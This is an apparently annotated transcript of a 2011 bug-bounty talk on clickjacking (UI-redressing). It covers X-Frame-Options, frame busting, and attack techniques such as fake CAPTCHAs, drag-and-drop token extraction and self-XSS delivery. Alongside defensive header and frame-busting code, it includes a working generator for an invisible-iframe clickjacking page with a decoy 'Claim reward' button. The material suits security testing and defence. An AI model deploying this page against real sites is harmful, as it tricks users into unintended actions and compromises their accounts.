Make profit with UI-Redressing attacks.

Published by Amol Naik, October 2011 Meet

1. Make Profit with UI-Redressing. AMol NAik, http://amolnaik4.blogspot.com
2. Agenda: UI-Redressing; Server-Side Mitigations; How to make Profit?; What to Target?; Tools to Hack; CSS Basics; Exploitation Techniques; Conclusion
3. UI-Redressing
   - The attacker changes the user interface the victim sees in the browser
   - The victim clicks a button on the attacker's site
   - He/she is actually clicking a button on the vulnerable site
   Source: http://www.imperva.com/resources/glossary/clickjacking_ui-redressing.html
4. UI-Redressing: mostly neglected by vendors
   - Why? It needs user interaction and is browser-dependent
   Impact:
   - Same as CSRF: one click and it's gone
   - Bypasses CSRF protections (the request is made by the victim's own browser from the genuine page, so any anti-CSRF token is already present)
   - Exploits "self-XSS"
   - Cross-domain content extraction
5. Server-Side Mitigations: X-Frame-Options
   - Response header
   - Supported by most of the latest browsers (today, all of them)
   - Two values to use:
     - DENY: the page cannot be displayed in a frame, regardless of the site attempting to do so
     - SAMEORIGIN: the page can only be displayed in a frame on the same origin as the page itself
   - Caveat: a third value, ALLOW-FROM uri, was only ever honoured by some browsers and is not safe to rely on; the modern equivalent is Content-Security-Policy: frame-ancestors, which should be sent alongside X-Frame-Options
6. Server-Side Mitigations: frame busting code
   - JavaScript
   - Ensures the current frame is the top-level window
   - Caveat: a naive buster that only redirects top can be neutralised (for example by an <iframe sandbox> that withholds allow-top-navigation), so it is a fallback for the header, not a replacement
   Source: https://www.owasp.org/index.php/Clickjacking
7. How to make Profit? Bug bounties
   - Google
     - Pays from $500 to $3133.7
     - XSS and CSRF are the prime focus
     - Name listed in the Google Security Hall of Fame: http://www.google.com/about/corporate/company/halloffame.html
   - Facebook
     - Starting from $500
     - XSS, CSRF, open redirect, database injection
     - Name listed in Facebook WhiteHat: http://www.facebook.com/whitehat
8. What to Target?
   - CSRF-protected actions
   - Pages with tokens
   - Self-XSS
9. Tools to Hack
   - Browser (the one I use)
   - Add-ons
     - Clickjacking Defense – Declarative Security, created by Aditya K Sood: checks for "X-Frame-Options"
     - Firebug: many uses, including CSS editing on the fly
10. CSS Basics
   - Opacity: sets transparency for the element (an iframe at opacity 0 is invisible but still receives clicks)
   - Top, Left: negative values shift elements out of the browser window
   - Position: specifies the type of positioning method used for an element
     - Static (default): the box is a normal box; the top, right, bottom and left properties do not apply
     - Relative: the box's position is calculated according to the normal flow, then offset by top/left
     - Absolute: the box's position is specified with the top, right, bottom and left properties, relative to its containing block
     - Fixed: the box's position is calculated according to the absolute model, but in addition the box is fixed relative to the viewport
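The following is an added example, not code from the slides: it emits the anti-framing headers a server should send for the two X-Frame-Options policies above (plus the CSP frame-ancestors equivalent), and classifies what a response carries, which is the same check the "Clickjacking Defense – Declarative Security" add-on mentioned on the Tools slide performs. The function names and the mock response object are assumptions for illustration.

```javascript
// Added example (not from the original slides). Plain Node.js, no dependencies.

// Headers for a framing policy. X-Frame-Options is what the slides cover;
// Content-Security-Policy: frame-ancestors (CSP Level 2) is the modern
// replacement and is sent alongside because older browsers only know XFO.
function antiFramingHeaders(policy) {
  switch (policy) {
    case 'deny':
      return { 'X-Frame-Options': 'DENY',
               'Content-Security-Policy': "frame-ancestors 'none'" };
    case 'sameorigin':
      return { 'X-Frame-Options': 'SAMEORIGIN',
               'Content-Security-Policy': "frame-ancestors 'self'" };
    default:
      throw new Error('unknown framing policy: ' + policy);
  }
}

// Apply the headers to a response object that exposes setHeader(name, value),
// e.g. Node's http.ServerResponse (hypothetical helper name).
function applyAntiFraming(res, policy) {
  const hdrs = antiFramingHeaders(policy);
  for (const [name, value] of Object.entries(hdrs)) res.setHeader(name, value);
  return hdrs;
}

// Classify a response's headers the way a scanner or the add-on would.
// Header names are case-insensitive, so normalise them first. Returns:
//   'unprotected' - no anti-framing header at all: frameable by any origin
//   'xfo-only'    - X-Frame-Options DENY/SAMEORIGIN only
//   'csp-only'    - frame-ancestors only (fine for current browsers)
//   'both'        - belt and braces
//   'invalid'     - X-Frame-Options is present but carries a value browsers
//                   do not honour (ALLOW-FROM, typos, two conflicting values):
//                   operationally the same as unprotected, but worth flagging
//                   separately because the developer clearly tried.
function classifyFraming(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  const csp = h['content-security-policy'] || '';
  const hasFrameAncestors = /(^|;)\s*frame-ancestors\s+\S/i.test(csp);
  const xfoValid = xfo === 'DENY' || xfo === 'SAMEORIGIN';
  if (xfoValid && hasFrameAncestors) return 'both';
  if (xfoValid) return 'xfo-only';
  if (hasFrameAncestors) return 'csp-only';
  if (xfo) return 'invalid';
  return 'unprotected';
}

// Constructed sample responses, as a scanner would see them.
const SAMPLE_RESPONSES = {
  bare:        {},
  xfo:         { 'x-frame-options': 'sameorigin' },
  allowFrom:   { 'X-Frame-Options': 'ALLOW-FROM https://partner.example' },
  cspOnly:     { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'" },
  hardened:    antiFramingHeaders('deny'),
};

function scanSamples() {
  const out = {};
  for (const [name, hdrs] of Object.entries(SAMPLE_RESPONSES)) out[name] = classifyFraming(hdrs);
  return out;
}
```

In a real handler the call is simply `applyAntiFraming(res, 'deny')` before writing the body; `classifyFraming` takes the header object from any HTTP client response, so it can be run over a crawl of an application to find the frameable pages the Target slide is after.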
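As an added example (not code from the slides, and not the OWASP page's snippet verbatim), here is the "hidden by default, reveal only when top-level" form of frame busting, written as a function over a window-like object so it can be exercised outside a browser. The function name `frameBust` and the `antiClickjack` style id are assumptions for illustration.

```javascript
// Added example (not from the original slides).
//
// The page ships with a <style> that hides <body>. The script removes that
// style only when the page is the top-level window; if it is framed it tries
// to navigate the top window to itself. The ordering matters: a buster that
// only does the navigation leaves a fully working page on screen whenever the
// redirect is blocked (e.g. the attacker's <iframe sandbox> without
// allow-top-navigation), which is exactly the state clickjacking needs. With
// the hidden-by-default variant a blocked redirect leaves nothing to click.

// Returns 'revealed' when the body was shown because the page is top-level,
// 'busted' when a navigation of the top window was attempted.
function frameBust(win) {
  const doc = win.document;
  if (win.self === win.top) {
    const style = doc.getElementById('antiClickjack');
    if (style && style.parentNode) style.parentNode.removeChild(style);
    return 'revealed';
  }
  try {
    // Assigning a Location (or URL string) to top.location navigates the top
    // window; a cross-origin top allows this write even though reads throw.
    win.top.location = win.self.location;
  } catch (e) {
    // Navigation refused (sandbox, or a browser that blocks it): the body
    // stays hidden, which is the safe outcome.
  }
  return 'busted';
}

// The equivalent markup to place first inside <head> of every sensitive page.
// It is the same logic inlined, using the real globals self/top/document.
const FRAME_BUST_MARKUP = `<style id="antiClickjack">body{display:none !important;}</style>
<script>
  if (self === top) {
    var s = document.getElementById('antiClickjack');
    s.parentNode.removeChild(s);
  } else {
    top.location = self.location;
  }
</script>`;
```

Send X-Frame-Options as well: the header is enforced by the browser before any script runs, while the script only helps on clients that ignore the header.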
11. Exploitation Techniques
12. Exploitation Techniques: action with a single click
   - Technique: simple clickjacking
   - Example: remove Google Books
13. Exploitation Techniques: action with two user clicks
   - Technique: fake arithmetic CAPTCHA (each "answer" the victim clicks is positioned over a different control in the hidden frame)
   - Example: remove Google Orkut service
14. Exploitation Techniques: single CSRF token
   - Technique: fake CAPTCHA with SVG masking
   - Cross-domain content extraction
   - Example: Facebook XHR
15. Exploitation Techniques: multiple CSRF tokens in the source
   - Technique: drag-n-drop with the "view-source:" scheme (the victim drags the framed page source, tokens included, into a field on the attacker's page)
   - Cross-domain content extraction
   - Example: Facebook PoC
16. Exploitation Techniques: self-XSS exploitation
   - Technique: drag-n-drop (the victim drags an attacker-supplied payload into the vulnerable field)
   - Example: Google Code XSS
17. Conclusion
   - Profit & fame
   - Most of the sites didn't implement protections
   - Firefox still supports the "view-source:" scheme in frames, which the drag-n-drop extraction technique relies on
   - The attack technique depends on the target
   - Imagination is the only limitation
18. References
   - https://www.owasp.org/index.php/Clickjacking
   - http://ui-redressing.mniemietz.de/uiRedressing.pdf
   - http://html5sec.org/
   - http://blog.kotowicz.net/2011/07/cross-domain-content-extraction-with.html
   - http://www.blog.fortitsecurity.com/2011/09/facebook-graph-api-access-token.html
   - http://www.w3.org/TR/CSS2/visuren.html#positioning-scheme
19. Questions: http://twitter.com/amolnaik4
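The CSS Basics slide and the simple-clickjacking technique above come together in the classic one-click proof of concept. The following is an added example, not code from the slides or the author's own PoCs: a generator for the attacker page, where the target is loaded in an iframe made invisible with opacity 0 and shifted with (typically negative) top/left so that the one control the victim should press sits exactly over a visible decoy button. The target URL, the coordinates and the function names are assumptions for illustration; on a real engagement the coordinates are measured in the browser (Firebug, as the Tools slide suggests) against the actual page.

```javascript
// Added example (not from the original slides). Generates the attacker's page
// for a single-click clickjacking PoC. All inputs are the tester's own
// constants, so no HTML escaping is applied.

// Where must the iframe be placed so that the control at (target.x, target.y)
// inside the framed page (coordinates relative to that page's top-left corner,
// unscrolled) lands on the decoy at (decoy.x, decoy.y) on the attacker page?
// A target deeper into its page than the decoy is on ours gives negative
// offsets: the frame is shifted partly out of the viewport, which is what the
// "negative top/left" bullet on the CSS Basics slide is about.
function frameOffset(decoy, target) {
  return { left: decoy.x - target.x, top: decoy.y - target.y };
}

// opts:
//   targetUrl - page hosting the sensitive one-click action (assumed URL)
//   decoy     - {x, y, w, h, label}: the visible lure the victim thinks they click
//   target    - {x, y}: the real control inside the framed page
//   frame     - {w, h}: size to give the iframe (large enough to contain target)
//   opacity   - 0 for the attack; ~0.5 while aligning during development
//   title     - page title for the lure
function buildClickjackPage(opts) {
  const off = frameOffset(opts.decoy, opts.target);
  const opacity = opts.opacity === undefined ? 0 : opts.opacity;
  const title = opts.title || 'Click to continue';
  // z-index puts the transparent iframe ABOVE the decoy, so the click goes to
  // the framed page while the victim sees the decoy underneath it.
  return `<!DOCTYPE html>
<html><head><meta charset="utf-8"><title>${title}</title>
<style>
  #decoy  { position:absolute; left:${opts.decoy.x}px; top:${opts.decoy.y}px;
            width:${opts.decoy.w}px; height:${opts.decoy.h}px; z-index:1; }
  #target { position:absolute; left:${off.left}px; top:${off.top}px;
            width:${opts.frame.w}px; height:${opts.frame.h}px;
            opacity:${opacity}; z-index:2; border:0; }
</style></head>
<body>
  <button id="decoy">${opts.decoy.label}</button>
  <iframe id="target" src="${opts.targetUrl}" scrolling="no"></iframe>
</body></html>`;
}

// Constructed sample: the sensitive "Remove" control sits at (420, 310) inside
// the target page; we want it under a 120x40 decoy drawn at (200, 150).
const SAMPLE_OPTS = {
  targetUrl: 'https://target.example/settings',   // assumed URL
  decoy: { x: 200, y: 150, w: 120, h: 40, label: 'Claim reward' },
  target: { x: 420, y: 310 },
  frame: { w: 1000, h: 800 },
  opacity: 0,
};

function samplePage() {
  return buildClickjackPage(SAMPLE_OPTS);
}
```

Write the output of `samplePage()` to a file and open it in the browser with `opacity: 0.5` first to confirm the alignment, then set it to 0 for the demo. Against a page that sends X-Frame-Options the iframe simply renders blank, which is also the quickest manual check that the header is being enforced.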
